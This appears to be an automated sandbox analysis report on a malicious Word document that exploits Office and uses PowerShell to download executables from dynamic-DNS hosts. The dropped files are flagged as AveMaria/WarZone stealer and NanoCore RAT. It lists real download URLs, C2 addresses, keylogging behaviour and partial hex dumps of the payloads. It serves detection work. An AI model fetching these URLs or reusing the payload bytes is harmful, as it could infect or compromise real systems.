Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00411446 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00411446 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: microA[1].exe.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic

DNS query: name: newhosteeeee.ydns.eu

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 203.159.80.186:8234
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 203.159.80.186:8234
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 203.159.80.186:8234
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 203.159.80.186:8234
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 203.159.80.186:8234

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: hhjhtggfr.duckdns.org

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_0040290E URLDownloadToFileW,ShellExecuteW,

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 203.159.80.186:6703

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 30 Jul 2021 09:52:56 GMTAccept-Ranges: bytesETag: "b34311ac2885d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:45:33 GMTContent-Length: 525312Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ef cb 03 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d0 07 00 00 32 00 00 00 00 00 00 ea ee 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 ee 07 00 57 00 00 00 00 00 08 00 84 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 ce 07 00 00 20 00 00 00 d0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 2f 00 00 00 00 08 00 00 30 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ee 07 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 cc 07 00 98 21 00 00 03 00 00 00 1c 00 00 06 d4 40 00 00 24 8c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1b 1e 2d 08 26 28 16 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 17 00 00 0a 74 02 00 00 02 19 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 2e 00 00 00 00 00 00 00 02 28 18 00 00 0a 02 03 16 2c 14 26 26 02 28 19 00 00 0a 6f 1a 00 00 0a 1b 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b e7 7d 04 00 00 04 2b 00 2a 00 00 06 2a 00 00 13 30 04 00 1b 01 00 00 01 00 00 11 02 7b 02 00 00 04 1d 2d 29 26 06 45 08 00 00 00 07 00 00 00 32 00 00 00 4d 00 00 00 6f 00 00 00 8a 00 00 00 ac 00 00 00 c7 00 00 00 e2 00 00 00 2b 03 0a 2b d5 16 2a 02 15 16 2c 17 26 26 02 20 af dd aa 79 1a 2d 13 26 26 02 17 7d 02 00 00 04 17 2b 0e 7d 02 00 00 04 2b e4 7d 03 00 00 04 2b e8 2a 02 15 7d 02 00 00 04 02 20 c7 84 f2 fd 7d 03 00 00 04 02 18 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 02 7b 05 00 00 04 20 86 e4 dd 4e 61 7d 03 00 00 04 02 19 7d 02 00 00 04 17 2a 02 15 7d 02 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 30 Jul 2021 09:52:56 GMTAccept-Ranges: bytesETag: "b34311ac2885d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:45:38 GMTContent-Length: 525312Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ef cb 03 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d0 07 00 00 32 00 00 00 00 00 00 ea ee 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 ee 07 00 57 00 00 00 00 00 08 00 84 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 ce 07 00 00 20 00 00 00 d0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 2f 00 00 00 00 08 00 00 30 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc ee 07 00 00 00 00 00 48 00 00 00 02 00 05 00 f8 cc 07 00 98 21 00 00 03 00 00 00 1c 00 00 06 d4 40 00 00 24 8c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1b 1e 2d 08 26 28 16 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 17 00 00 0a 74 02 00 00 02 19 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 2e 00 00 00 00 00 00 00 02 28 18 00 00 0a 02 03 16 2c 14 26 26 02 28 19 00 00 0a 6f 1a 00 00 0a 1b 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b e7 7d 04 00 00 04 2b 00 2a 00 00 06 2a 00 00 13 30 04 00 1b 01 00 00 01 00 00 11 02 7b 02 00 00 04 1d 2d 29 26 06 45 08 00 00 00 07 00 00 00 32 00 00 00 4d 00 00 00 6f 00 00 00 8a 00 00 00 ac 00 00 00 c7 00 00 00 e2 00 00 00 2b 03 0a 2b d5 16 2a 02 15 16 2c 17 26 26 02 20 af dd aa 79 1a 2d 13 26 26 02 17 7d 02 00 00 04 17 2b 0e 7d 02 00 00 04 2b e4 7d 03 00 00 04 2b e8 2a 02 15 7d 02 00 00 04 02 20 c7 84 f2 fd 7d 03 00 00 04 02 18 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 02 7b 05 00 00 04 20 86 e4 dd 4e 61 7d 03 00 00 04 02 19 7d 02 00 00 04 17 2a 02 15 7d 02 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 02 Aug 2021 07:13:53 GMTAccept-Ranges: bytesETag: "382415f36d87d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:46:50 GMTContent-Length: 1378816Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /microA.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: GET /microA.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newhosteeeee.ydns.euConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /microC.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hutyrtit.ydns.euConnection: Keep-Alive

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_0040290E URLDownloadToFileW,ShellExecuteW,

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16BDD4F7-5649-4CA3-B477-D1894D362AA0}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /microA.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newhosteeeee.ydns.euConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /microA.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /microC.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hutyrtit.ydns.euConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: newhosteeeee.ydns.eu

Source: powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp	String found in binary or memory: httP://newhosteeeee.ydn
Source: powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp	String found in binary or memory: httP://newhosteeeee.ydns.eu/micr
Source: powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2101479507.0000000000654000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2101084138.0000000000413000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2101559005.0000000001C26000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp	String found in binary or memory: httP://newhosteeeee.ydns.eu/microA.exe
Source: powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp	String found in binary or memory: httP://newhosteeeee.ydns.eu/microA.exePE
Source: powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp	String found in binary or memory: http://newhosteeeee.ydns.eu
Source: powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.2111095740.000000001B4F0000.00000004.00000001.sdmp	String found in binary or memory: http://newhosteeeee.ydns.eu/microA.exe
Source: powershell.exe, 00000003.00000002.2101386936.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103676493.0000000002520000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000003.00000002.2101386936.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103676493.0000000002520000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000003.00000002.2099920892.0000000000419000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000003.00000002.2099858527.00000000003CE000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://w
Source: powershell.exe, 00000003.00000002.2099920892.0000000000419000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.comJ
Source: microA.exe, images.exe	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\AppData\Local\Temp\images.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\images.exe

Source: C:\Users\user\AppData\Local\Temp\images.exe

Code function: 25_2_03BCCBD0 GetOpenClipboardWindow,

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_0040813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,

Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp

Binary or memory string: GetRawInputData

E-Banking Fraud:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 10.2.microA.exe.2095f04.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000024.00000002.2366916666.00000000007D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2366832596.00000000007B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000024.00000002.2366678139.0000000000740000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
